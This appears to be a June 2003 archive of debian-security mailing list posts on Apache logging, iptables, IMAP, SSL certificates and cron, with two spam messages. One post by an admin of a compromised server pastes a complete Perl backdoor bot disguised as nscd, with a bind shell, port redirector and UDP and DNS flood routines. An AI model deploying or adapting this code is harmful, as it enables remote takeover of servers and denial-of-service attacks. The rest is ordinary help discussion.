 believe there is a direct dependency from core Nautilus to
 portmap, but possibly some of the Nautilus extras or vfs extrase
 are causing the dependency.

Yeah, it's strange. Even stranger, that nautilus won't start at all, if
the connection to port 111 fails!!

-- 
Best wishes,
Andi


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst 
Hi Phillip

On Dienstag, 10-Jun-03 at 19:59:40, Phillip Hofmeister wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote:
 Hi
 
 Hello,
 
 isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
 dhcp requests from clients?
 
 No lan here.. !!
 
 That IP address might be used by your cable modem service as an
 internal management address to hand out IP addresses. Or it might even
 be your bridge (cable modem). In either case. This is not something to
 be worried about. In fact I made a special rule in my iptables so such
 packets don't get logged.

Cool, thanks a lot for your help!!

So, can I happily block them? As it
seems, unfortunately I have to keep udp port 68 stateful open, to renew
the dhcp lease, no?

-- 
All the best, and really thanks a lot for your answers,
Andi


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: cronjob stuck

2003-06-10 Thread Dale Amon 
On Tue, Jun 10, 2003 at 10:22:09PM +0100, Dale Amon wrote:
 Has anyone else had trouble making vixie cron STFU? Am
 I hallucinating? Is my brain in need of Coke and MM's?

Actually I've now done pretty much just that and 
discovered it was a strange coincidence... some other
process was doing exactly the same thing my cronjob was
to do with exactly the same 5 minute interval between
runs and one minute off the execution times I expected!

queue Twilight Zone Theme


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

RE: OPENSSL

2003-06-10 Thread Reckhard, Tobias 
On Tue, Jun 10, Stefan Neufeind wrote:
 I'm using a 128-bit-cert.

You're using an X.509 certificate. The grade of symmetric encryption
negotiated between browser and web server is (at least in theory)
independent of the certificate.

 But browsers that support less encryption 
 (e.g. IE that comes with WinNT4) can't access my SSL-pages because 
 the encryption doesn't allow degration.

The original NT shipped with IE2. Are you sure you want people to still use
that?

 Is there any way to solve 
 this prob? Using Apache with an official SSL-cert.
 
 PS: This just came to my mind when you said step-up - cause in my 
 case it would be a step-down, right?

I could imagine that IE2 has numerous problems with SSL. It could well be
one of the browsers that need to see step-up certificates before they
perform 128-bit symmetric cryptography. But I don't know.

Make sure you've allowed your Apache to use small key sizes first. I
wouldn't use them, but you should be sure that it's not your server that's
refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to apply the
latest service pack and preferrably install IE6SP1 plus the Hotfixes that
have been released since.

And then they should install a better browser and use that instead. ;-

Cheers,
Tobias


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: Scanning with reverse connections?

2003-06-10 Thread Phillip Hofmeister 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, 09 Jun 2003 at 08:36:03PM -0500, Jones wrote:
 Phillip, I didn't post the entire file.


Sorry, that was so far up in the thread I lost track of it...

 The default policy on the INPUT chain is DROP.   I do allow incoming 

Good

 ssh  ftp from a couple of Linux servers that I manage.  All other 
 TCP traffic on the external interface is stopped by the -p tcp --syn 
 -j DROP rule.  I also have the rule -t nat -A POSTROUTING -o 
 $EXTERNAL_IF -j MASQUERADE coz this machine is a server for a couple 
 of machines connected to its local (non-internet) interface.

Much like my setup...

 
 The rules also contain the usual stuff so the internal interfaces work i.e.
 iptables -A INPUT -i lo -j ACCEPT

Don't want to mess with the lo because then nasty things happen, good
move.

 From your response I assume that this setup would make the system 
 safe from unwanted/unexpected incoming traffic that originates from 
 well known ports.  What do these attacks do to fools firewalls 
 anyway?  Are there firewalls out there that let in traffic if it 
 appears to originate from a well known port.

I would stick with the -m state --state ESTABLISHED,RELATED rules and
get rid of the whole syn thing.  There are some attacks (such as XMas or
FIN Scans) that can take advantage of the fact you only trap SYN
packets.  A much better approach is either to match using:

- -m state --state NEW

OR

Simply let the packet fall through until it hits the default DROP.


I would show you my implementation but I tend not to pass my firewall
script around very often...

Let me know if you need more help.

- -- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
- --
Excuse #9: Magnetic interference from money/credit cards 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5VuhS3Jybf3L5MQRAkStAJ9uxgrgCj6iP3l+493d5lo1cGUtoACgh9Qi
JoT2SmTfkKgrYeYbP+3Eq48=
=doq/
-END PGP SIGNATURE-

Bom dia debian-security

2003-06-10 Thread kandrak 


Message to debian-security@lists.debian.org 

Ola
debian-security
GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO
==Estamos operando em Novo Formato==

Confira em:
 escuta21.kit.netou
http://www.escuta21.kit.net

ei debian-security
Cuidado com o que fala ao Celular...
ele tb tem ouvidos...

para remover o  debian-security@lists.debian.org de nossa lista 
responda este e-mail e coloque remover
nos perdoe o transtorno...ok?

kandrak

IMAP is too secure...

2003-06-10 Thread Hobbs, Richard 
Helo,

I think my IMAP server has become too secure... I'm using the current
version of uw-imapd and libc-client2003debian, as listed in stable and
stable-proposed-updates.

I cannot log into my IMAP server any more... It keeps saying Invalid
password. I can only assume it's using password encryption, but I don't
know how to turn it off.

It was never turned on before, but since the upgrade I've een unable to
retrieve my mail through IMAP. It usually asks in the config whether I
want clear-text passwords enabled or not, but it wasn't an option this
time.

Any ideas? I really need to get at the mail.

Thanks in advance...

Hobbs.

--
Richard Hobbs [EMAIL PROTECTED]
http://mongeese.co.uk | http://unixforum.co.uk

There's only one way of life, and that's your own - The Levellers

Registered Linux User: 313906
_
Send all your jokes to [EMAIL PROTECTED] !!
To subscribe, email: [EMAIL PROTECTED]


smime.p7s
Description: S/MIME cryptographic signature

apache

2003-06-10 Thread Martynas Domarkas 
Hi. I would like to use date string in apache log file names. Is there a
way to use some directive in httpd.conf to be parsed as shell command
like `date +%Y%m%d` or some other way to solve the problem? I will use
logrotate mechanism of debian, and this date string could be used only
for file creation after apache process receives SIGUSR1.





-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331

Re: apache

2003-06-10 Thread Jamie Heilman 
Martynas Domarkas wrote:
 Hi. I would like to use date string in apache log file names. Is there a
 way to use some directive in httpd.conf to be parsed as shell command
 like `date +%Y%m%d` or some other way to solve the problem? I will use
 logrotate mechanism of debian, and this date string could be used only
 for file creation after apache process receives SIGUSR1.

Grab the cronolog package, its easier and less intrusive.

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
We must be born with an intuition of mortality.  Before we know the words
 for it, before we know there are words, out we come bloodied and squalling
 with the knowledge that for all the compasses in the world, there's only
 one direction, and time is its only measure.  -Rosencrantz

Re: apache

2003-06-10 Thread Martynas Domarkas 
An, 2003-06-10 12:01, Jamie Heilman rašė:
 Martynas Domarkas wrote:
  Hi. I would like to use date string in apache log file names. Is there a
  way to use some directive in httpd.conf to be parsed as shell command
  like `date +%Y%m%d` or some other way to solve the problem? I will use
  logrotate mechanism of debian, and this date string could be used only
  for file creation after apache process receives SIGUSR1.
 
 Grab the cronolog package, its easier and less intrusive.
 
 -- 
 Jamie Heilman   http://audible.transient.net/~jamie/
 We must be born with an intuition of mortality.  Before we know the words
  for it, before we know there are words, out we come bloodied and squalling
  with the knowledge that for all the compasses in the world, there's only
  one direction, and time is its only measure.-Rosencrantz


Thanks, but I realy do not like instalation of another packages. There
must be a way to do this with apache configuration.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331

Re: apache

2003-06-10 Thread Teun Vink 
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
[...]
 
 Thanks, but I realy do not like instalation of another packages. There
 must be a way to do this with apache configuration.

You could add a line to your /etc/logrotate.d/apache configuration, 
so it would look something like this:

[...]
   postrotate
  /etc/init.d/apache reload  /dev/null
  mv -f $1.0 $1.`date +%Y-%m-%d`
   endscript
[...]

This would rename access.log.0 to access.log.2003-06-10


Regards,


Teun Vink

Re: apache

2003-06-10 Thread Martynas Domarkas 
An, 2003-06-10 12:56, Teun Vink rašė:
 On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
 [...]
  
  Thanks, but I realy do not like instalation of another packages. There
  must be a way to do this with apache configuration.
 
 You could add a line to your /etc/logrotate.d/apache configuration, 
 so it would look something like this:
 
 [...]
postrotate
   /etc/init.d/apache reload  /dev/null
   mv -f $1.0 $1.`date +%Y-%m-%d`
endscript
 [...]
 
 This would rename access.log.0 to access.log.2003-06-10
 
 
 Regards,
 
 
 Teun Vink
 

Thanks a lot. This is nice solution, but I still like apache do the job,
and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
seen somewhere some piece of shell command in httpd.conf.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331

Re[2]: apache

2003-06-10 Thread Dominik Schulz 
Perhaps I've got you wrong but wouldn't
--- snip ---
TransferLog | /usr/sbin/rotatelogs 
/var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800
--- end ---
do it?

Martynas Domarkas [EMAIL PROTECTED] wrote on 10 Jun 2003 13:02:55 +0300:

 An, 2003-06-10 12:56, Teun Vink raðë:
  On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
  [...]
   
   Thanks, but I realy do not like instalation of another packages. There
   must be a way to do this with apache configuration.
  
  You could add a line to your /etc/logrotate.d/apache configuration, 
  so it would look something like this:
  
  [...]
 postrotate
/etc/init.d/apache reload  /dev/null
mv -f $1.0 $1.`date +%Y-%m-%d`
 endscript
  [...]
  
  This would rename access.log.0 to access.log.2003-06-10
  
  
  Regards,
  
  
  Teun Vink
  
 
 Thanks a lot. This is nice solution, but I still like apache do the job,
 and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
 seen somewhere some piece of shell command in httpd.conf.
 
 
 -- 
 Pagarbiai
 IT sistemø administratorius
 Martynas Domarkas
 tel.: +370 698 44331
 
 
 
 -- 
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Mit freundlichen Gruessen / Best regards
Dominik Schulz

RE: OPENSSL

2003-06-10 Thread Reckhard, Tobias 
 I'm trying to generate a 40-bit certificate using OPENSSL.Can 
 anybody tell me if this is possible and with which package?

The RSA keys used in X.509 certificates are typically 1024 or 2048 bits in
length. What length the symmetric key used between two parties that have
authenticated via X.509 certificates (with RSA keys) to subsequently protect
their communication has, is not directly related to the certificate.

There are web browsers that will negotiate 128 bits only if the certificate
presented by the web server is a step-up certificate. I'm not sure what
makes a certificate a step-up certificate, however, nor if this restriction
still applies to current browsers.

Cheers,
Tobias

Re: OPENSSL

2003-06-10 Thread Berin Lautenbach 


Reckhard, Tobias wrote:

There are web browsers that will negotiate 128 bits only if the
certificate presented by the web server is a step-up certificate.
I'm not sure what makes a certificate a step-up certificate, however,
nor if this restriction still applies to current browsers.


The step up involved the browser checking the signer was a legitimate CA
to sign a step-up cert and then performing the re-negotiation. The
restriction disapeared when the crypto export laws were all relaxed. You
have to go a fair way back (few years) to get a browser that still only
supports 128bit symmetric in SGC mode.

Cheers,
Berin

Re: Re[2]: apache

2003-06-10 Thread Martynas Domarkas 
An, 2003-06-10 13:46, Dominik Schulz rašė: 
 Perhaps I've got you wrong but wouldn't
 --- snip ---
 TransferLog | /usr/sbin/rotatelogs 
 /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800
 --- end ---
 do it?
 
 Martynas Domarkas [EMAIL PROTECTED] wrote on 10 Jun 2003 13:02:55 +0300:
 
  An, 2003-06-10 12:56, Teun Vink raðë:
   On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
   [...]

Thanks, but I realy do not like instalation of another packages. There
must be a way to do this with apache configuration.
   
   You could add a line to your /etc/logrotate.d/apache configuration, 
   so it would look something like this:
   
   [...]
  postrotate
 /etc/init.d/apache reload  /dev/null
 mv -f $1.0 $1.`date +%Y-%m-%d`
  endscript
   [...]
   
   This would rename access.log.0 to access.log.2003-06-10
   
   
   Regards,
   
   
   Teun Vink
   
  
  Thanks a lot. This is nice solution, but I still like apache do the job,
  and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
  seen somewhere some piece of shell command in httpd.conf.
  
  
  -- 
  Pagarbiai
  IT sistemø administratorius
  Martynas Domarkas
  tel.: +370 698 44331
  
  
  
  -- 
  To UNSUBSCRIBE, email to [EMAIL PROTECTED]
  with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 
 
 Mit freundlichen Gruessen / Best regards
 Dominik Schulz
 

Yes, of course. But in this case I will invoke rotatelogs... I don't
like it.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331

Bom dia debian-securityESCUTA21 em Novo Formato

2003-06-10 Thread kandrak 


Message to debian-security@lists.debian.org 

Ola
debian-security
GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO
==Estamos operando em Novo Formato==

Confira em:
 escuta21.kit.netou
http://www.escuta21.kit.net

ei debian-security
Cuidado com o que fala ao Celular...
ele tb tem ouvidos...

para remover o  debian-security@lists.debian.org de nossa lista 
responda este e-mail e coloque remover
nos perdoe o transtorno...ok?

kandrak

Re: IMAP is too secure...

2003-06-10 Thread Jelmer Barhorst 
Hi Richard,

Since libc-client2003debian it's only posible to use a SSL connection. Most
clients support it, but if you really want to allow plaintext IMAP again,
please run 'dpkg-reconfigure libc-client2003debian' and awnser Yes to
'Should plaintext passwords be enabled?'.

To enable it manualy, create  /etc/c-client.cf with the following contents:
--8--
I accept the risk
set disable-plaintext nil
--8--

A better sollution would be to set your client to use SSL on port 993. The
only thing you still have to worry about are the certificates.

Jelmer


- Original Message -
From: Hobbs, Richard [EMAIL PROTECTED]
To: debian-security@lists.debian.org
Sent: Tuesday, June 10, 2003 8:32 AM
Subject: IMAP is too secure...


 Helo,

 I think my IMAP server has become too secure... I'm using the current
 version of uw-imapd and libc-client2003debian, as listed in stable and
 stable-proposed-updates.

 I cannot log into my IMAP server any more... It keeps saying Invalid
 password. I can only assume it's using password encryption, but I don't
 know how to turn it off.

 It was never turned on before, but since the upgrade I've een unable to
 retrieve my mail through IMAP. It usually asks in the config whether I
 want clear-text passwords enabled or not, but it wasn't an option this
 time.

 Any ideas? I really need to get at the mail.

 Thanks in advance...

 Hobbs.

 --
 Richard Hobbs [EMAIL PROTECTED]
 http://mongeese.co.uk | http://unixforum.co.uk

 There's only one way of life, and that's your own - The Levellers

 Registered Linux User: 313906
 _
 Send all your jokes to [EMAIL PROTECTED] !!
 To subscribe, email: [EMAIL PROTECTED]

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Stefan Neufeind 
Thank you for the information. Am I right that php-skripts then would 
need an execute-bit set? Currently they don't have ...

On 9 Jun 2003 at 17:59, Jon wrote:

 On Mon, 2003-06-09 at 17:28, Phillip Hofmeister wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
  
  On Mon, 09 Jun 2003 at 09:35:49PM +0200, Stefan Neufeind wrote:
   But you mean starting with #! ?? How could I use the normal way of
   setting a cgi-handler for calling .php-files? Know what I mean?
   
   Using Misc Binary-support (and therefor patching the kernel) seems
   no solution to me. Isn't there some way to make it work using
   Apache- features?
  
  MISC Binary is not patching the kernel.  MISC Binary comes as an
  option with the stock kernel.  You might have to compile your own
  kernel (I don't know, I haven't used a stock Debian kernel in a VERY
  long time...)
  
 
 The binfmt_misc kernel module is included in the stock Debian kernels,
 AFAIK.  There is a nice package, binfmt-support (ala
 update-alternatives) that allows one to easily configure binfmt_misc:
 
 
 Package: binfmt-support
 Support for extra binary formats
 
 The binfmt_misc kernel module, contained in versions 2.1.43 and later
 of the Linux kernel, allows system administrators to register
 interpreters for various binary formats based on a magic number or
 their file extension, and cause the appropriate interpreter to be
 invoked whenever a matching file is executed. Think of it as a more
 flexible version of the #! executable interpreter mechanism.
 
 This package provides an 'update-binfmts' script with which package
 maintainers can register interpreters to be used with this module
 without having to worry about writing their own init.d scripts, and
 which sysadmins can use for a slightly higher-level interface to this
 module.

Re: OPENSSL

2003-06-10 Thread Stefan Neufeind 
I'm using a 128-bit-cert. But browsers that support less encryption 
(e.g. IE that comes with WinNT4) can't access my SSL-pages because 
the encryption doesn't allow degration. Is there any way to solve 
this prob? Using Apache with an official SSL-cert.

PS: This just came to my mind when you said step-up - cause in my 
case it would be a step-down, right?

On 10 Jun 2003 at 21:49, Berin Lautenbach wrote:

 Reckhard, Tobias wrote:
  There are web browsers that will negotiate 128 bits only if the
  certificate presented by the web server is a step-up certificate.
  I'm not sure what makes a certificate a step-up certificate,
  however, nor if this restriction still applies to current browsers.
 
 The step up involved the browser checking the signer was a legitimate
 CA to sign a step-up cert and then performing the re-negotiation. The
 restriction disapeared when the crypto export laws were all relaxed.
 You have to go a fair way back (few years) to get a browser that still
 only supports 128bit symmetric in SGC mode.

re: strange broadcast packets

2003-06-10 Thread kuba . jakubik 

Hello,

isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to dhcp 
requests from clients?


Carpe Noctem,

Kuba BIGHard Jakubik

unsubscibe

2003-06-10 Thread loretta whitehead 
hi my name is loretta i got this really cool incredimail downloaded on my computer..but it does not work...I've tried every thing my email will come to the incredimail account but i can not respond so i don't want it any more can you please take it off so i can use my sbcglobal account again.I even had t sighn up for a new email address just so i could respond to some of my e mail.thats sad.PLEASE take it off 
Do you Yahoo!?
Free online calendar with sync to Outlook(TM).

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Jon 
On Tue, 2003-06-10 at 08:24, Stefan Neufeind wrote:
 Thank you for the information. Am I right that php-skripts then would 
 need an execute-bit set? Currently they don't have ...
 

Unfortunately, yes.  Otherwise you'll get a 500 Internal Server Error or
the likes.  

- Jon

-- 
[EMAIL PROTECTED]

Administrator, tgpsolutions
http://www.tgpsolutions.com


signature.asc
Description: This is a digitally signed message part

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Phillip Hofmeister 
On Tue, 10 Jun 2003 at 05:24:59PM +0200, Stefan Neufeind wrote:
 Thank you for the information. Am I right that php-skripts then would 
 need an execute-bit set? Currently they don't have ...
 

They will be being treated like a normal binary file, so yes (that is,
if you want yours scripts to work).  If on the other hand, you don't
want your sk|pt5 to work then you don't need to set the execute bit G.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #67: Typo in the code

Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst 
Hi Phillip

On Dienstag, 10-Jun-03 at 01:33:07, Phillip Hofmeister wrote:

 On Tue, 10 Jun 2003 at 12:20:10AM +0100, Andreas W?st wrote:
 Hi
 
 Although I can see no evidence for portmapper being run by issuing
 netstat -tu -l -ee -p, everytime nautilus is started it connects to
 port 111, and even gets an answer from there. And even after this
 connection, I can't see a server listening on port 111 via netstat.
 
 What is going on here? If I block port 111 nautilus wont start.
 
 How can I make sure portmapper is not being run, or at least only in
 a controlled manner, say for nautilus?
 
 
 I usually use a netstat -apn (requires r00t).  It will show you all
 sockets (listening or otherwise) and what app owns them.  The -n makes
 it so it does not resolve the port numbers via /etc/service.

No matter if I try netstat -apn or netstat -atunp as someone pointed out
in private, it gives the same result as netstat -tu -l -ee -p, apart
from the established connections, namely there is nothing listening in
port 111.

Furhtermore, package portmap is NOT installed, but there are working
connections via 111 when nautilus starts up..

-- 
Best wishes,
Andi

Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst 
Hi

 Hello,
 
 isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
 dhcp requests from clients?

No lan here.. !!

-- 
Best wishes,
Andi

Re: Re[2]: apache

2003-06-10 Thread Mark L. Kahnt 
On Tue, 2003-06-10 at 09:49, Martynas Domarkas wrote:
 An, 2003-06-10 13:46, Dominik Schulz rašė: 
  Perhaps I've got you wrong but wouldn't
  --- snip ---
  TransferLog | /usr/sbin/rotatelogs 
  /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800
  --- end ---
  do it?
  
  Martynas Domarkas [EMAIL PROTECTED] wrote on 10 Jun 2003 13:02:55 +0300:
  
   An, 2003-06-10 12:56, Teun Vink raðë:
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
[...]
 
 Thanks, but I realy do not like instalation of another packages. There
 must be a way to do this with apache configuration.

You could add a line to your /etc/logrotate.d/apache configuration, 
so it would look something like this:

[...]
   postrotate
  /etc/init.d/apache reload  /dev/null
  mv -f $1.0 $1.`date +%Y-%m-%d`
   endscript
[...]

This would rename access.log.0 to access.log.2003-06-10


Regards,


Teun Vink

   
   Thanks a lot. This is nice solution, but I still like apache do the job,
   and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
   seen somewhere some piece of shell command in httpd.conf.
   
   
   -- 
   Pagarbiai
   IT sistemø administratorius
   Martynas Domarkas
   tel.: +370 698 44331
   
   
   
   -- 
   To UNSUBSCRIBE, email to [EMAIL PROTECTED]
   with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
  
  
  Mit freundlichen Gruessen / Best regards
  Dominik Schulz
  
 
 Yes, of course. But in this case I will invoke rotatelogs... I don't
 like it.
 
 
 -- 
 Pagarbiai
 IT sistemų administratorius
 Martynas Domarkas
 tel.: +370 698 44331

IIUC, you are wanting to control the file name applied to rotated logs
from Apache, but you seem to be of the belief that Apache itself is
rotating the log files. Unless this has been added since I last read
through the the Apache configuration documentation, I don't remember
seeing the log rotation functionality being part of it (although I last
read through the documenttation in entirety several years back.) It is
handled by a separate package, on Debian most commonly logrotate,
regardless of the name applied to the rotated file.
-- 
Mark L. Kahnt, FLMI/M, ALHC, HIA, AIAA, ACS, MHP
ML Kahnt New Markets Consulting
Tel: (613) 531-8684 / (613) 539-0935
Email: [EMAIL PROTECTED]


signature.asc
Description: This is a digitally signed message part

Re: strange broadcast packets

2003-06-10 Thread Phillip Hofmeister 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote:
 Hi
 
  Hello,
  
  isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
  dhcp requests from clients?
 
 No lan here.. !!

That IP address might be used by your cable modem service as an internal
management address to hand out IP addresses.  Or it might even be your
bridge (cable modem).  In either case.  This is not something to be
worried about.  In fact I made a special rule in my iptables so such
packets don't get logged.

Be well,

- -- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
- --
Excuse #34: Heavy gravity fluctuation move computer to floor rapidly 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5iqFS3Jybf3L5MQRAvTTAJ9HjtzJ3VLuxePPG6Ph9ZOW9dYKgACfXpet
jjtqPu0j7Se0dWS2gwScG10=
=3kbY
-END PGP SIGNATURE-

unsubscribe

2003-06-10 Thread Johannes Kleinlercher

a weird script worm uploaded via php with debian 3.0 ?

2003-06-10 Thread Robert Ebright 
Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entryFile: /tmp/crontab.LYukbF
0 * * * * /tmp/.nscdrecover

this starts at
auth.log.0:Jun  6 17:00:01 debian
PAM_unix[26934]: (cron) session opened for user
www-data by (uid=0)auth.log.0:Jun  6 17:00:02
debianPAM_unix[26934]: (cron) session closed for user
www-dataand runs every hour

and under SYSLOG it starts

syslog.3:Jun  6 16:27:27 debian crontab[26795]:
(www-data) LIST (www-data)syslog.3:Jun  6
16:27:28 debiancrontab[26798]:
(www-data) REPLACE (www-data)syslog.3:Jun  6
16:27:34debian crontab[26804]:
(www-data) LIST (www-data)syslog.3:Jun  6
16:27:34 debiancrontab[26807]:
(www-data) REPLACE (www-data)syslog.3:Jun  6
17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
(/tmp/.nscdrecover)

so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan

the contents are pasted below


#!/usr/bin/perl -w

$pass = J9YcGEyNypkzI;
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;

sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET-new( Proto = tcp,
Listen = 1, ReuseAddr = 1,   
LocalPort =$port) or exit;
$sin = $sa-accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET-new( Proto = tcp,
PeerAddr = $dest) or exit;$sin-autoflush(1);
$sout-autoflush(1);
$sel = IO::Select-new($sin, $sout);
while(@sock = $sel-can_read(180)) {
foreach $s(@sock) {
$buf = $s; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}

sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, X;
open STDOUT, X;
open STDERR, X;
close X;
exec(/bin/sh);
}

sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET-new(Proto =
'udp', PeerAddr = $host,
PeerPort = int(rand 65535))
or exit;   
$sock-autoflush(1);$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}

sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET-new(Proto
= 'udp', PeerAddr = $host,
PeerPort = 53) or exit;
$sock-autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
 
send($sock,$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01,0);}}

$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, /dev/null;
open STDOUT, /dev/null;
open STDERR, /dev/null;
POSIX::setsid();

$csock = IO::Socket::INET-new(Proto = 'udp',
LocalPort = 1337, ReuseAddr = 1) or
exit;while($string =$csock)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split 
, $string;next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq ping) {
my $bsock =
IO::Socket::INET-new(Proto =
'udp', PeerAddr = $arg1,
  PeerPort = $arg2,
ReuseAddr = 1) or
next;   
print $bsockpong 
.`uname -mnrs`;
close $bsock;
} elsif ($cmd eq die) {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq redir) {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq shell) {
shell($arg1) unless(fork);
} elsif ($cmd eq udp) {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq ddns) {
ddns($arg1, $arg2) unless(fork);
}
}



A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directorys from the old
site.Then this all started after a user logged
in onFriday June 6th first login at 14:16 ending
14:24the script starts at 14:27


worldspe ftpd26405pm6-s104.amazon. Fri Jun
6 15:06 - 15:06  (00:00)worldspe ftpd26325
pm6-s104.amazon. Fri

Re: apache

2003-06-10 Thread Jamie Heilman 
Martynas Domarkas wrote:
 
 Thanks, but I realy do not like instalation of another packages. There
 must be a way to do this with apache configuration.

Martynas Domarkas wrote:
 
 Thanks a lot. This is nice solution, but I still like apache do the job,
 and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have
 seen somewhere some piece of shell command in httpd.conf.

Martynas Domarkas wrote:
 
 Yes, of course. But in this case I will invoke rotatelogs... I don't
 like it.

As, you've exhausted the other possibilites, why not
read the fine manual: http://httpd.apache.org/docs/logs.html

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
Most people wouldn't know music if it came up and bit them on the ass.
-Frank Zappa

cronjob stuck

2003-06-10 Thread Dale Amon 
Just ran across an interesting prob, wondered if
anyone else has seen it. I added a repeating entry
to /etc/cron.d/foo that ran every */5 minutes. I
then tried to get rid of it... It will not die.

I moved the file out of /etc/cron.d and it still
is running.

I cp'd the file and deleted the old one in case
cron remembered the inode (rather a long shot).
No change.

I did /etc/init.d/cron stop; /etc/init.d/cron start;
still it repeats.

I did updatedb and locate cron; can't find it cached
anywhere.

cron doesn't seem to have any flush options and no
indication that it should be caching across executions.

I could certainly (I hope!) get rid of it by rebooting
but I can't do that with this system at this time.

Has anyone else had trouble making vixie cron STFU? Am
I hallucinating? Is my brain in need of Coke and MM's?

-- 
--
   IN MY NAME:Dale Amon, CEO/MD
  No Mushroom clouds over Islandone Society
London and New York.  www.islandone.org
--

Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst 
Hi Phillip

